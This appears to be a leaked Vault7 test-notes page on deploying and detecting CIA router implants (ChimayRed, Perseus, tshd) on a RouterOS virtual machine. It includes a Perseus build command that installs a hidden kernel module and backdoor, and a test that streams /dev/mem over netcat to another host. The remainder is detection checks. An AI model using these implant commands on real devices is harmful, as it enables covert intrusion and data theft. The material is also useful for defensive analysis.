Vault7: CIA Hacking Tools Revealed

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Owner: User #14587667
DUT5 - x86 VM - Notes
VLAN: 617
ROS: 6.19
Tool Versions Used:
ChimayRed 4.6.1
TshPatcher 1.0.4
Perseus 1.1.0
Test Notes
- Create Ubuntu 14.10 Host VM
- Imported ROS 6.19 x86 VMVirtual Machine into vSphere.
- Generate Perseus binary: python bin/ -f /flash/boot/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /flash/etc/rc.d/run.d/S99tsh -d /flash/boot/hidden -p /flash/rw/tmp/tshd-mipsbe -S /flash/boot/hidden/startup -s 2 -m /flash/boot/hidden/mcc.ko -r /flash/boot/hidden/dont_panic -z /flash/boot/hidden/zero deploy_$PERSEUS_DEPLOY_VER
- Configured WAN, LAN, DHCPDynamic Host Configuration Protocol Server, NATNetwork Address Translation on DUT.
- Threw ChimayRed and Tshd. Uploaded BB.
Tests to Run:
mcc is visible
ID | Status | Task |
1 | incomplete | lsmod | grep mcc # mcc will appear in list |
2 | incomplete | ls /lib/modules/3.3.5 #no mcc |
3 | incomplete | ls /ram/pckg #no mcc |
Inconsistent hiding
ID | Status | Task |
4 | incomplete | ls /sys/module #mcc should be visible |
5 | incomplete | ls /sys/kernel # mcc should be hidden |
Flux appears in firewall connections
ID | Status | Task |
6 | incomplete |
/ip firewall connection print |
Sequential listing of /proc/pid reveals hidden directories.
ID | Status | Task |
7 | incomplete | Run following script |
#echo "PIDs in /proc/" > proc_dirs
while [ $i -lt 1000 ];
test -d /proc/$i && echo $i >> proc_dirs
bb ls -1v /proc > ls_dirs
bb grep -Fxv -f ls_dirs proc_dirs
Check if connection is attempted to
ID | Status | Task |
8 | incomplete | /system logging add action=echo topics=!ntp,!dhcp,!rip,!snmp |
Inspect Memory
ID | Status | Task |
9 | incomplete | ICON: nc -l -p 9999 | dd bs=1048576 of=DUTX-ram.bin |
10 | incomplete | Target: busbybox dd if=/dev/mem bs=1048576 count=256 | bb nc 9999 |
11 | incomplete | Check for ELFs |
12 | incomplete | Check if call tables were modified |
13 | incomplete | Check mcc.ko for 'srcversion' string |
14 | incomplete | Remove perseus and re-inspect memory for mcc unload |